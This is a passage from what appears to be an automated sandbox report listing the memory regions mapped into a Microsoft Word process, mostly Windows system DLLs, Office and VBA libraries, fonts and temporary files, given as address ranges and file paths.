Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 413 start_va = 0xa2d0000 end_va = 0xa3cffff entry_point = 0x0 region_type = private name = "private_0x000000000a2d0000" filename = "" Region: id = 414 start_va = 0x7fef6140000 end_va = 0x7fef6174fff entry_point = 0x7fef6140000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 415 start_va = 0x7fef6180000 end_va = 0x7fef69fdfff entry_point = 0x7fef6180000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\grooveintlresource.dll") Region: id = 416 start_va = 0x7fffff76000 end_va = 0x7fffff77fff entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 417 start_va = 0x7fffff78000 end_va = 0x7fffff79fff entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 418 start_va = 0x2fc0000 end_va = 0x2fdefff entry_point = 0x0 region_type = private name = "private_0x0000000002fc0000" filename = "" Region: id = 419 start_va = 0x7fef60b0000 end_va = 0x7fef60bbfff entry_point = 0x7fef60b0000 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 420 start_va = 0x7fef60c0000 end_va = 0x7fef613dfff entry_point = 0x7fef60c0000 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 421 start_va = 0x2750000 end_va = 0x2751fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002750000" filename = "" Region: id = 422 start_va = 0x2760000 end_va = 0x2766fff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 423 start_va = 0x2790000 end_va = 0x2792fff entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 424 start_va = 0x7fef60a0000 end_va = 0x7fef60aefff entry_point = 0x7fef60a0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 425 start_va = 0x7fef6020000 end_va = 0x7fef609ffff entry_point = 0x7fef6020000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 426 start_va = 0x2eb0000 end_va = 0x2eb0fff entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 427 start_va = 0x2ee0000 end_va = 0x2ee0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 428 start_va = 0x2f00000 end_va = 0x2f00fff entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 429 start_va = 0x2f20000 end_va = 0x2f20fff entry_point = 0x0 region_type = private name = "private_0x0000000002f20000" filename = "" Region: id = 430 start_va = 0x7fefcf10000 end_va = 0x7fefcf32fff entry_point = 0x7fefcf10000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 431 start_va = 0x3c0000 end_va = 0x3c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 432 start_va = 0x2430000 end_va = 0x2441fff entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 433 start_va = 0x2450000 end_va = 0x245efff entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 434 start_va = 0x2570000 end_va = 0x2581fff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 435 start_va = 0x3440000 end_va = 0x345efff entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 436 start_va = 0x4390000 end_va = 0x43d7fff entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 437 start_va = 0x44e0000 end_va = 0x4527fff entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 438 start_va = 0xa7d0000 end_va = 0xa8cffff entry_point = 0x0 region_type = private name = "private_0x000000000a7d0000" filename = "" Region: id = 439 start_va = 0xac50000 end_va = 0xad4ffff entry_point = 0x0 region_type = private name = "private_0x000000000ac50000" filename = "" Region: id = 440 start_va = 0xadf0000 end_va = 0xaeeffff entry_point = 0x0 region_type = private name = "private_0x000000000adf0000" filename = "" Region: id = 441 start_va = 0x7fef18d0000 end_va = 0x7fef18edfff entry_point = 0x7fef18d0000 region_type = mapped_file name = "msohev.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\MSOHEV.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msohev.dll") Region: id = 442 start_va = 0x7fffff66000 end_va = 0x7fffff67fff entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 443 start_va = 0x7fffff68000 end_va = 0x7fffff69fff entry_point = 0x0 region_type = private name = "private_0x000007fffff68000" filename = "" Region: id = 444 start_va = 0x7fffff70000 end_va = 0x7fffff71fff entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 445 start_va = 0x2fc0000 end_va = 0x2fdefff entry_point = 0x0 region_type = private name = "private_0x0000000002fc0000" filename = "" Region: id = 446 start_va = 0x4630000 end_va = 0x464efff entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 447 start_va = 0x4650000 end_va = 0x466efff entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 448 start_va = 0x7fefb210000 end_va = 0x7fefb23bfff entry_point = 0x7fefb210000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 449 start_va = 0x2590000 end_va = 0x2590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 450 start_va = 0x7fef5b80000 end_va = 0x7fef5b8efff entry_point = 0x7fef5b80000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 451 start_va = 0x7fef5cf0000 end_va = 0x7fef5d75fff entry_point = 0x7fef5cf0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 452 start_va = 0xa5b0000 end_va = 0xa62ffff entry_point = 0x0 region_type = private name = "private_0x000000000a5b0000" filename = "" Region: id = 453 start_va = 0x7fef5880000 end_va = 0x7fef5893fff entry_point = 0x7fef5880000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 454 start_va = 0x7fef5b90000 end_va = 0x7fef5bb6fff entry_point = 0x7fef5b90000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 455 start_va = 0x7fef5bc0000 end_va = 0x7fef5ca1fff entry_point = 0x7fef5bc0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 456 start_va = 0x7fef18c0000 end_va = 0x7fef18ccfff entry_point = 0x7fef18c0000 region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files\\microsoft office\\root\\office16\\wordcnvpxy.cnv") Region: id = 457 start_va = 0x7fef1890000 end_va = 0x7fef18b6fff entry_point = 0x7fef1890000 region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\TEXTCONV\\MSCONV97.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\textconv\\msconv97.dll") Region: id = 458 start_va = 0x7fef18c0000 end_va = 0x7fef18cefff entry_point = 0x7fef18c0000 region_type = mapped_file name = "recovr32.cnv" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\TEXTCONV\\RECOVR32.CNV" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\textconv\\recovr32.cnv") Region: id = 459 start_va = 0x7fef16c0000 end_va = 0x7fef170efff entry_point = 0x7fef16c0000 region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\TEXTCONV\\WPFT632.CNV" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 460 start_va = 0x7fefcb40000 end_va = 0x7fefcb61fff entry_point = 0x7fefcb40000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 461 start_va = 0x7fefc650000 end_va = 0x7fefc69bfff entry_point = 0x7fefc650000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 462 start_va = 0x7fef11b0000 end_va = 0x7fef11d6fff entry_point = 0x7fef11befac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\TEXTCONV\\MSCONV97.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\textconv\\msconv97.dll") Region: id = 463 start_va = 0x7fef16d0000 end_va = 0x7fef1708fff entry_point = 0x7fef16d0000 region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\TEXTCONV\\WPFT532.CNV" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 464 start_va = 0x2730000 end_va = 0x2732fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002730000" filename = "" Region: id = 465 start_va = 0x5300000 end_va = 0x537ffff entry_point = 0x5300000 region_type = mapped_file name = "~wrf{0732d5f3-d4fc-493c-b4bb-78965d42254e}.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{0732D5F3-D4FC-493C-B4BB-78965D42254E}.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.word\\~wrf{0732d5f3-d4fc-493c-b4bb-78965d42254e}.tmp") Region: id = 466 start_va = 0x74cf0000 end_va = 0x74dc1fff entry_point = 0x74cf0000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\msvcr100.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\msvcr100.dll") Region: id = 467 start_va = 0x7fee36e0000 end_va = 0x7fee3b10fff entry_point = 0x7fee36e0000 region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 468 start_va = 0x2770000 end_va = 0x2771fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002770000" filename = "" Region: id = 469 start_va = 0x2780000 end_va = 0x2781fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002780000" filename = "" Region: id = 470 start_va = 0x91d0000 end_va = 0x92cffff entry_point = 0x0 region_type = private name = "private_0x00000000091d0000" filename = "" Region: id = 471 start_va = 0x92d0000 end_va = 0x9396fff entry_point = 0x92d0000 region_type = mapped_file name = "calibri.ttf" filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf") Region: id = 472 start_va = 0x93b0000 end_va = 0x93bffff entry_point = 0x0 region_type = private name = "private_0x00000000093b0000" filename = "" Region: id = 473 start_va = 0x7fee3e60000 end_va = 0x7fee3f19fff entry_point = 0x7fee3e60000 region_type = mapped_file name = "uiautomationcore.dll" filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll") Region: id = 474 start_va = 0x7fef1cc0000 end_va = 0x7fef1d13fff entry_point = 0x7fef1cc0000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 475 start_va = 0x2790000 end_va = 0x2790fff entry_point = 0x2790000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 476 start_va = 0xaef0000 end_va = 0xb3a1fff entry_point = 0x0 region_type = private name = "private_0x000000000aef0000" filename = "" Region: id = 477 start_va = 0x77390000 end_va = 0x77392fff entry_point = 0x77390000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 478 start_va = 0x7fef5020000 end_va = 0x7fef502bfff entry_point = 0x7fef5020000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 479 start_va = 0x2ea0000 end_va = 0x2ea0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ea0000" filename = "" Region: id = 480 start_va = 0x9bc0000 end_va = 0x9ca0fff entry_point = 0x9bc0000 region_type = mapped_file name = "msword.olb" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\MSWORD.OLB" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msword.olb") Region: id = 481 start_va = 0xb3b0000 end_va = 0xc37ffff entry_point = 0x0 region_type = private name = "private_0x000000000b3b0000" filename = "" Region: id = 482 start_va = 0xa8d0000 end_va = 0xab51fff entry_point = 0xa8d0000 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 483 start_va = 0xa8d0000 end_va = 0xab51fff entry_point = 0xa8e4c98 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 484 start_va = 0x7fee3450000 end_va = 0x7fee36defff entry_point = 0x7fee3464c98 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 485 start_va = 0x2ed0000 end_va = 0x2ed2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ed0000" filename = "" Region: id = 486 start_va = 0x2f40000 end_va = 0x2f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 487 start_va = 0x7fef1850000 end_va = 0x7fef1875fff entry_point = 0x7fef1850000 region_type = mapped_file name = "vbe7intl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll") Region: id = 488 start_va = 0x2f60000 end_va = 0x2f69fff entry_point = 0x2f60000 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 489 start_va = 0x2f80000 end_va = 0x2f80fff entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 490 start_va = 0x5380000 end_va = 0x53bffff entry_point = 0x0 region_type = private name = "private_0x0000000005380000" filename = "" Region: id = 491 start_va = 0x2fa0000 end_va = 0x2fa2fff entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 492 start_va = 0x3060000 end_va = 0x3063fff entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 493 start_va = 0x3090000 end_va = 0x3090fff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 494 start_va = 0x3210000 end_va = 0x3210fff entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 495 start_va = 0x4770000 end_va = 0x4770fff entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 496 start_va = 0x67d0000 end_va = 0x67d7fff entry_point = 0x0 region_type = private name = "private_0x00000000067d0000" filename = "" Region: id = 497 start_va = 0x67e0000 end_va = 0x681ffff entry_point = 0x0 region_type = private name = "private_0x00000000067e0000" filename = "" Region: id = 498 start_va = 0x6820000 end_va = 0x6822fff entry_point = 0x0 region_type = private name = "private_0x0000000006820000" filename = "" Region: id = 499 start_va = 0x6830000 end_va = 0x6846fff entry_point = 0x69933cc region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 500 start_va = 0x68e0000 end_va = 0x68f0fff entry_point = 0x68e0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 501 start_va = 0x6900000 end_va = 0x6988fff entry_point = 0x690caf0 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll") Region: id = 502 start_va = 0x6a20000 end_va = 0x6a48fff entry_point = 0x6a20000 region_type = mapped_file name = "fm20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\FM20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\fm20.dll") Region: id = 503 start_va = 0x6850000 end_va = 0x6853fff entry_point = 0x0 region_type = private name = "private_0x0000000006850000" filename = "" Region: id = 504 start_va = 0x6990000 end_va = 0x6993fff entry_point = 0x0 region_type = private name = "private_0x0000000006990000" filename = "" Region: id = 505 start_va = 0x6a50000 end_va = 0x6a52fff entry_point = 0x0 region_type = private name = "private_0x0000000006a50000" filename = "" Region: id = 506 start_va = 0x6a60000 end_va = 0x6a62fff entry_point = 0x0 region_type = private name = "private_0x0000000006a60000" filename = "" Region: id = 507 start_va = 0x7fee32b0000 end_va = 0x7fee3447fff entry_point = 0x7fee337f400 region_type = mapped_file name = "fm20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\FM20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\fm20.dll") Region: id = 508 start_va = 0x9040000 end_va = 0x90bffff entry_point = 0x0 region_type = private name = "private_0x0000000009040000" filename = "" Region: id = 509 start_va = 0x9f60000 end_va = 0x9fdffff entry_point = 0x9f60000 region_type = mapped_file name = "~dfe5d8e3f73a92a76c.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~DFE5D8E3F73A92A76C.TMP" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~dfe5d8e3f73a92a76c.tmp") Region: id = 510 start_va = 0xa8d0000 end_va = 0xaacffff entry_point = 0x0 region_type = private name = "private_0x000000000a8d0000" filename = "" Region: id = 511 start_va = 0x6a70000 end_va = 0x6a77fff entry_point = 0x0 region_type = private name = "private_0x0000000006a70000" filename = "" Region: id = 512 start_va = 0x9cb0000 end_va = 0x9ceffff entry_point = 0x0 region_type = private name = "private_0x0000000009cb0000" filename = "" Region: id = 513 start_va = 0x6a80000 end_va = 0x6a82fff entry_point = 0x0 region_type = private name = "private_0x0000000006a80000" filename = "" Region: id = 514 start_va = 0x6a90000 end_va = 0x6a97fff entry_point = 0x6bf33cc region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 515 start_va = 0x9e10000 end_va = 0x9e35fff entry_point = 0x9e10000 region_type = mapped_file name = "msforms.exd" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE\\MSForms.exd" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\vbe\\msforms.exd") Region: id = 516 start_va = 0xa6c0000 end_va = 0xa7bffff entry_point = 0x0 region_type = private name = "private_0x000000000a6c0000" filename = "" Region: id = 517 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 518 start_va = 0x6aa0000 end_va = 0x6aaffff entry_point = 0x0 region_type = private name = "private_0x0000000006aa0000" filename = "" Region: id = 519 start_va = 0x6f30000 end_va = 0x6f30fff entry_point = 0x0 region_type = private name = "private_0x0000000006f30000" filename = "" Region: id = 520 start_va = 0x7fee2b70000 end_va = 0x7fee2d78fff entry_point = 0x7fee2b70000 region_type = mapped_file name = "vbeuiintl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBEUIINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\1033\\vbeuiintl.dll") Region: id = 521 start_va = 0x7fee2d80000 end_va = 0x7fee32aafff entry_point = 0x7fee2d80000 region_type = mapped_file name = "vbeuires.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\VBA\\VBA7.1\\VBEUIRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\vba\\vba7.1\\vbeuires.dll") Region: id = 522 start_va = 0x6f40000 end_va = 0x6f49fff entry_point = 0x6f40000 region_type = mapped_file name = "vbe6ext.olb" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\VBA\\VBA6\\VBE6EXT.OLB" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\vba\\vba6\\vbe6ext.olb") Region: id = 523 start_va = 0x90c0000 end_va = 0x90c3fff entry_point = 0x90c0000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 524 start_va = 0x93a0000 end_va = 0x93a3fff entry_point = 0x0 region_type = private name = "private_0x00000000093a0000" filename = "" Region: id = 525 start_va = 0x9fe0000 end_va = 0xa004fff entry_point = 0xa0af400 region_type = mapped_file name = "fm20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\FM20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\fm20.dll") Region: id = 526 start_va = 0xa3d0000 end_va = 0xa44ffff entry_point = 0xa3d0000 region_type = mapped_file name = "~dfb8712bdaddade275.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~DFB8712BDADDADE275.TMP" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~dfb8712bdaddade275.tmp") Region: id = 527 start_va = 0xa450000 end_va = 0xa4cffff entry_point = 0xa450000 region_type = mapped_file name = "~df1ef17eb80fd76d6f.tmp" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Temp\\~DF1EF17EB80FD76D6F.TMP" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\~df1ef17eb80fd76d6f.tmp") Region: id = 528 start_va = 0xa4d0000 end_va = 0xa4f8fff entry_point = 0xa59f400 region_type = mapped_file name = "fm20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\FM20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\fm20.dll") Region: id = 529 start_va = 0xc380000 end_va = 0xd37ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c380000" filename = "" Region: id = 530 start_va = 0x7fef1700000 end_va = 0x7fef1707fff entry_point = 0x7fef1700000 region_type = mapped_file name = "fm20enu.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\FM20ENU.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\fm20enu.dll") Region: id = 531 start_va = 0x9cf0000 end_va = 0x9cf3fff entry_point = 0x0 region_type = private name = "private_0x0000000009cf0000" filename = "" Region: id = 532 start_va = 0x9cf0000 end_va = 0x9cf3fff entry_point = 0x0 region_type = private name = "private_0x0000000009cf0000" filename = "" Region: id = 533 start_va = 0x9d00000 end_va = 0x9d03fff entry_point = 0x0 region_type = private name = "private_0x0000000009d00000" filename = "" Region: id = 534 start_va = 0x9e40000 end_va = 0x9e43fff entry_point = 0x0 region_type = private name = "private_0x0000000009e40000" filename = "" Region: id = 535 start_va = 0x7fee2990000 end_va = 0x7fee2b63fff entry_point = 0x7fee2990000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 536 start_va = 0xaad0000 end_va = 0xac1ffff entry_point = 0x0 region_type = private name = "private_0x000000000aad0000" filename = "" Region: id = 537 start_va = 0xd380000 end_va = 0xd53ffff entry_point = 0x0 region_type = private name = "private_0x000000000d380000" filename = "" Region: id = 538 start_va = 0xd540000 end_va = 0xd79ffff entry_point = 0x0 region_type = private name = "private_0x000000000d540000" filename = "" Region: id = 539 start_va = 0xaad0000 end_va = 0xab9ffff entry_point = 0x0 region_type = private name = "private_0x000000000aad0000" filename = "" Region: id = 540 start_va = 0xaba0000 end_va = 0xac1ffff entry_point = 0x0 region_type = private name = "private_0x000000000aba0000" filename = "" Region: id = 541 start_va = 0xd7a0000 end_va = 0xd9effff entry_point = 0x0 region_type = private name = "private_0x000000000d7a0000" filename = "" Region: id = 542 start_va = 0xd9f0000 end_va = 0xddeffff entry_point = 0x0 region_type = private name = "private_0x000000000d9f0000" filename = "" Region: id = 543 start_va = 0x9e50000 end_va = 0x9e50fff entry_point = 0x9e50000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 544 start_va = 0x9d10000 end_va = 0x9d13fff entry_point = 0x0 region_type = private name = "private_0x0000000009d10000" filename = "" Region: id = 545 start_va = 0x9d20000 end_va = 0x9d23fff entry_point = 0x0 region_type = private name = "private_0x0000000009d20000" filename = "" Region: id = 546 start_va = 0x7fef11b0000 end_va = 0x7fef11d7fff entry_point = 0x7fef11b0000 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 547 start_va = 0x7fef8930000 end_va = 0x7fef8947fff entry_point = 0x7fef8930000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 548 start_va = 0x7fef0d30000 end_va = 0x7fef0d63fff entry_point = 0x7fef0d30000 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 549 start_va = 0x7fee2820000 end_va = 0x7fee298efff entry_point = 0x7fee2820000 region_type = mapped_file name = "msado15.dll" filename = "\\Program Files\\Common Files\\System\\ado\\msado15.dll" (normalized: "c:\\program files\\common files\\system\\ado\\msado15.dll") Region: id = 550 start_va = 0x7fef0d00000 end_va = 0x7fef0d27fff entry_point = 0x7fef0d00000 region_type = mapped_file name = "msdart.dll" filename = "\\Windows\\System32\\msdart.dll" (normalized: "c:\\windows\\system32\\msdart.dll") Region: id = 551 start_va = 0xddf0000 end_va = 0xe02ffff entry_point = 0x0 region_type = private name = "private_0x000000000ddf0000" filename = "" Region: id = 552 start_va = 0x9d30000 end_va = 0x9d43fff entry_point = 0x9d31070 region_type = mapped_file name = "wshom.ocx" 